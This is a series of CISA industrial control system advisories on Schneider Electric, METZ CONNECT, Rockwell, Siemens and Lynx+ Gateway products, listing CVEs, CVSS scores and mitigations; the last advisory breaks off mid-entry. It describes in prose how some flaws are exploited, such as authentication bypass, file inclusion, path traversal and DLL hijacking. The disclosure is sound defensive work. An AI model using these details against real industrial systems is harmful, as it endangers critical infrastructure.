View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 8.3
• ATTENTION: Low Attack Complexity
• Vendor: Schneider Electric
• Equipment: EcoStruxure Machine SCADA Expert & Pro-face BLUE Open Studio
• Vulnerability: Use of a Broken or Risky Cryptographic Algorithm

2. RISK EVALUATION

Successful exploitation of this vulnerability could lead to loss of confidentiality and integrity.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Schneider Electric reports that the following products use an affected AVEVA component:

• EcoStruxure Machine SCADA Expert: Versions prior to 2023.1 Patch 1
• Pro-face BLUE Open Studio: Versions prior to 2023.1 Patch 1

3.2 VULNERABILITY OVERVIEW

3.2.1 Use of a Broken or Risky Cryptographic Algorithm CWE-327

The vulnerability disclosed by AVEVA Group Limited impacts the affected Schneider Electric software. Additional information about the vulnerabilities can be found in the AVEVA advisory AVEVA-2025-006. The vulnerability, if exploited, could allow a attacker with read access to Edge project files or Edge offline cache files to reverse engineer Edge users’ app-native or active directory passwords through computational brute-forcing of weak hashes.

CVE-2025-9317 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.4 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N).

A CVSS v4 score has also been calculated for CVE-2025-9317. A base score of 8.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Critical Manufacturing, Energy
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: France

3.4 RESEARCHER

Schneider Electric reported this vulnerability to CISA.

4. MITIGATIONS

Schneider Electric has identified the following specific remediations users can apply to reduce risk:

• Version 2023.1 Patch 1 of EcoStruxure Machine SCADA Expert includes a fix for this vulnerability and is available for download. For additional details please refer to the supplied readme help file in Version 2023.1 Patch 1.
• Version 2023.1 Patch 1 of Pro-face BLUE Open Studio includes a fix for this vulnerability and is available for download. For additional details please refer to the supplied release notes file in Version 2023.1 Patch 1.

If users choose not to apply the remediations provided above, they should immediately apply the following mitigations to reduce the risk of exploitation:

• Access control lists should be applied to all folders where users will save and load project files.
• Maintain a trusted chain-of-custody on project files during creation, modification, distribution, backup, and use.
• Apply data-protection at the project level with a strong master password. For step-by-step configuration instructions, refer to “Technical Reference Manual” > Project Overview > Configuring Additional Project Settings > Options Tab > Data Protection.
• If passwords are being used as function parameters inside project documents (such as scripts or worksheets), it is recommended to remove those passwords and use project tags instead. For more information on tags refer to “Technical Reference Manual” > Tags and the Tag Database > About Tags and the Project Database.

For more information see the associated Schneider Electric security advisory SEVD-2025-315-02 EcoStruxure Machine SCADA Expert & Pro-face BLUE Open Studio – PDF Version
The CSAF version is available here.

Schneider Electric strongly recommends the following industry cybersecurity best practices:

• Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
• Install physical controls so no unauthorized personnel can access industrial control and safety systems, components, peripheral equipment, and networks.
• Place all controllers in locked cabinets and never leave them in the “Program” mode.
• Never connect programming software to any network other than the network intended for that device.
• Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
• Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
• Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
• When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.
• For more information, refer to the Schneider Electric Recommended Cybersecurity Best Practices document.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

• November 18, 2025: Initial Republication of Schneider Electric SEVD-2025-315-02

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 9.3
• ATTENTION: Exploitable remotely/low attack complexity
• Vendor: METZ CONNECT
• Equipment: EWIO2
• Vulnerabilities: Authentication Bypass by Primary Weakness, Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’), Unrestricted Upload of File with Dangerous Type, Path Traversal: ‘…/…//’, Improper Access Control

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication and control the device remotely or perform remote code execution.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

METZ CONNECT reports that the following products are affected:

• METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-M: All versions
• METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-M-BM: All versions
• METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-BM: All versions

3.2 Vulnerability Overview

3.2.1 AUTHENTICATION BYPASS BY PRIMARY WEAKNESS CWE-305

The commissioning wizard on the affected devices does not validate if the device is already initialized. An unauthenticated remote attacker can construct POST requests to set root credentials.

CVE-2025-41733 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-41733. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.2 IMPROPER CONTROL OF FILENAME FOR INCLUDE/REQUIRE STATEMENT IN PHP PROGRAM (‘PHP REMOTE FILE INCLUSION’) CWE-98

An unauthenticated remote attacker can execute arbitrary PHP files and gain full access of the affected devices.

CVE-2025-41734 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-41734. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.3 UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE CWE-434

A low privileged remote attacker can upload any file to an arbitrary location due to missing file check resulting in remote code execution.

CVE-2025-41735 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-41735. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.4 PATH TRAVERSAL: ‘…/…//’ CWE-35

A low privileged remote attacker can upload a new or overwrite an existing python script by using a path traversal of the target filename in PHP resulting in a remote code execution.

CVE-2025-41736 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-41736. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.5 IMPROPER ACCESS CONTROL CWE-284

Due to webserver misconfiguration an unauthenticated remote attacker is able to read the source of PHP modules.

CVE-2025-41737 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2025-41737. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

Noam Moshe and Tomer Goldschmidt of Claroty Team82 reported these vulnerabilities to CISA.

4. MITIGATIONS

METZ CONNECT has identified the following specific workarounds and mitigations users can apply to reduce risk:

• (Product Group: METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-M(All versions), METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-M-BM(All versions), METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-BM(All versions)): METZ CONNECT has released a new SW-Version 2.2.0. Install version 2.2.0 or later to remediate this vulnerability. Schedule the update at your next maintenance window. No workaround offers equivalent protection.

The following product versions have been fixed:

• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41733
• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41733
• Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41733
• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41734
• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41734
• Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41734
• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41735
• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41735
• Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41735
• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41736
• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41736
• Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41736
• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41737
• Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41737
• Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41737

For more information see the associated METZ CONNECT GmbH security advisory VDE-2025-097 VDE-2025-097: Metz: Config API – Authentication bypass leads to admin takeover in EWIO2 series – HTML, VDE-2025-097: Metz: Config API – Authentication bypass leads to admin takeover in EWIO2 series – CSAF.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

5. UPDATE HISTORY

• November 18, 2025: Initial Publication

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 8.4
• ATTENTION: Exploitable remotely/low attack complexity
• Vendor: Rockwell Automation
• Equipment: Verve Asset Manager
• Vulnerability: Incorrect Authorization

2. RISK EVALUATION

Successful exploitation of this vulnerability could result in an attacker accessing or altering user data.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Verve Asset Manager, an OT cybersecurity platform, are affected:

• Verve Asset Manager: Version 1.33
• Verve Asset Manager: Version 1.34
• Verve Asset Manager: Version 1.35
• Verve Asset Manager: Version 1.36
• Verve Asset Manager: Version 1.37
• Verve Asset Manager: Version 1.38
• Verve Asset Manager: Version 1.39
• Verve Asset Manager: Version 1.40
• Verve Asset Manager: Version 1.41
• Verve Asset Manager: Version 1.41.1
• Verve Asset Manager: Version 1.41.2
• Verve Asset Manager: Version 1.41.3

3.2 VULNERABILITY OVERVIEW

3.2.1 INCORRECT AUTHORIZATION CWE-863

A security issue was discovered within Verve Asset Manager allowing unauthorized read-only users to read, update, and delete users via the API.

CVE-2025-11862 has been assigned to this vulnerability. A CVSS v3 base score of 9.9 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-11862. A base score of 8.4 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:L/SA:H).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: United States

3.4 RESEARCHER

Rockwell Automation reported this vulnerability to CISA.

4. MITIGATIONS

Rockwell Automation has addressed this issue in version 1.41.4 and 1.42. Rockwell Automation encourages users to update to the newest available version.

For more information about this issue, see the advisory on the Rockwell Automation security page.

Users with additional questions can contact Rockwell Automation TechConnect for help.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

• November 13, 2025: Initial Republication of Rockwell Automation advisory ‘Verve Asset Manager Access Control
  Vulnerability’

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 8.7
• ATTENTION: Exploitable remotely/low attack complexity
• Vendor: Rockwell Automation
• Equipment: FactoryTalk Policy Manager
• Vulnerability: Improper Resource Shutdown or Release

2. RISK EVALUATION

Successful exploitation of this vulnerability could lead to resource exhaustion and denial of service.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Rockwell Automation reports that the following versions of FactoryTalk Policy Manager, a software tool that enables OT teams to design, deploy, and manage system-wide security policies using CIP Security and OPC UA standards, are affected:

• FactoryTalk Policy Manager: Versions 6.51.00 and prior

3.2 VULNERABILITY OVERVIEW

3.2.1 Improper Resource Shutdown or Release CWE-404

A vulnerability in Node.js HTTP servers may allow an attacker to send a specially crafted HTTP request with chunked encoding, which can lead to resource exhaustion and denial of service. The server reads an unbounded number of bytes from a single connection, exploiting the lack of limitations on chunk extension bytes. This issue can cause CPU and network bandwidth exhaustion, bypassing standard safeguards like timeouts and body size limits.

CVE-2024-22019 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

A CVSS v4 score has also been calculated for CVE-2024-22019. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: United States

3.4 RESEARCHER

Rockwell Automation reported this vulnerability to CISA.

4. MITIGATIONS

Rockwell Automation reports this issue is corrected in software Version 6.60.00 and later.

For more information about this issue, see the advisory on the Rockwell Automation security page.

Users of the affected software who are unable to upgrade to one of the corrected versions should follow Rockwell Automation security best practices.

If you have any questions regarding the security issue above and how to mitigate it, contact TechConnect for assistance. More information can be found at Contact Us | Rockwell Automation | US.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

• November 13, 2025: Initial Republication of Rockwell Automation advisory

As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens’ ProductCERT Security Advisories (CERT Services | Services | Siemens Global).

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v3 7.8
• ATTENTION: Low attack complexity
• Vendor: Siemens
• Equipment: Altair Grid Engine
• Vulnerabilities: Generation of Error Message Containing Sensitive Information, Uncontrolled Search Path Element

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to escalate privileges and execute arbitrary code with superuser permissions.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Altair Grid Engine are affected:

• Altair Grid Engine: All versions prior to V2026.0.0

3.2 VULNERABILITY OVERVIEW

3.2.1 GENERATION OF ERROR MESSAGE CONTAINING SENSITIVE INFORMATION CWE-209

Affected products do not properly handle error messages and disclose sensitive password hash information when processing user authentication requests. This could allow a local attacker to extract password hashes for privileged accounts, which can then be subjected to offline brute-force attacks.

CVE-2025-40760 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.5 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

3.2.2 UNCONTROLLED SEARCH PATH ELEMENT CWE-427

Affected products do not properly validate environment variables when loading shared libraries, allowing path hijacking through malicious library substitution. This could allow a local attacker to execute arbitrary code with superuser privileges by manipulating the environment variable and placing a malicious library in the controlled path.

CVE-2025-40763 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

Daniele Montanaro reported these vulnerabilities to Siemens. Siemens ProductCERT reported these vulnerabilities to CISA.

4. MITIGATIONS

Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:

• Update to V2026.0.0 or later version.
• CVE-2025-40760: For clusters not using the UGERest API/daemon remove the setuid-root bit from the binaries for all architectures: chmod u-s $SGE_ROOT/utilbin//authuser.
• CVE-2025-40763: For non Windows clusters remove the setuid-root bit from the “sgepasswd” binary for all installed architectures: chmod u-s $SGE_ROOT/bin//sgepasswd.

As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens’ operational guidelines for industrial security and following recommendations in the product manuals.

Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage.

For more information see the associated Siemens security advisory SSA-514895 in HTML and CSAF.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely.

5. UPDATE HISTORY

• November 13, 2025: Initial Republication of Siemens SSA-514895

As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens’ ProductCERT Security Advisories (CERT Services | Services | Siemens Global).

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 8.5
• ATTENTION: Low attack complexity
• Vendor: Siemens
• Equipment: Software Center and Solid Edge
• Vulnerability: Uncontrolled Search Path Element

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code via placing a crafted DLL file on the system.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Siemens Software Center and Solid Edge are affected:

• Siemens Software Center: All versions prior to 3.5
• Solid Edge SE2025: All versions prior to V225.0 Update 10

3.2 VULNERABILITY OVERVIEW

3.2.1 UNCONTROLLED SEARCH PATH ELEMENT CWE-427

The affected application is vulnerable to DLL hijacking. This could allow an attacker to execute arbitrary code via placing a crafted DLL file on the system.

CVE-2025-40827 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-40827. A base score of 8.5 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

Sahil Shah from National Forensic Sciences University reported this vulnerability to Siemens.

4. MITIGATIONS

Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:

• Siemens Software Center: Update to V3.5 or later version
• Solid Edge SE2025: Update to V225.0 Update 10 or later version

As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens’ operational guidelines for industrial security and following recommendations in the product manuals.

Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage.

For more information see the associated Siemens security advisory SSA-365596 in HTML and CSAF.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

• November 13, 2025: Initial Republication of Siemens SSA-365596

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 9.2
• ATTENTION: Exploitable remotely/low attack complexity
• Vendor: General Industrial Controls
• Equipment: Lynx+ Gateway
• Vulnerabilities: Weak Password Requirements, Missing Authentication for Critical Function, Cleartext Transmission of Sensitive Information

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could result in obtaining sensitive device information, unauthorized access, or create a denial-of-service condition.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Lynx+ Gateway are affected:

• Lynx+ Gateway: Version R08
• Lynx+ Gateway: Version V03
• Lynx+ Gateway: Version V05
• Lynx+ Gateway: Version V18

3.2 VULNERABILITY OVERVIEW

3.2.1 WEAK PASSWORD REQUIREMENTS CWE-521

The affected product is vulnerable to a weak password requirement vulnerability, which may allow an attacker to execute a brute-force attack resulting in unauthorized access and login.

CVE-2025-55034 has been assigned to this vulnerability. A CVSS v3 base score of 8.2 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N).

A CVSS v4 score has also been calculated for CVE-2025-55034. A base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N).

3.2.2 MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306

The affected product is missing critical authentication in the embedded web server which could allow an attacker to remotely reset the device.

CVE-2025-58083 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-58083. A base score of 9.2 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:H).

3.2.3 MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306

The affected product is missing critical authentication in the embedded web server which could allow an attacker to send GET requests to obtain sensitive device information.

CVE-2025-59780 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2025-59780. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).

3.2.4 CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION CWE-319

The affected product is vulnerable to a cleartext transmission vulnerability that could allow an attacker to observe network traffic to obtain sensitive information, including plaintext credentials.

CVE-2025-62765 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2025-62765. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: India

3.4 RESEARCHER
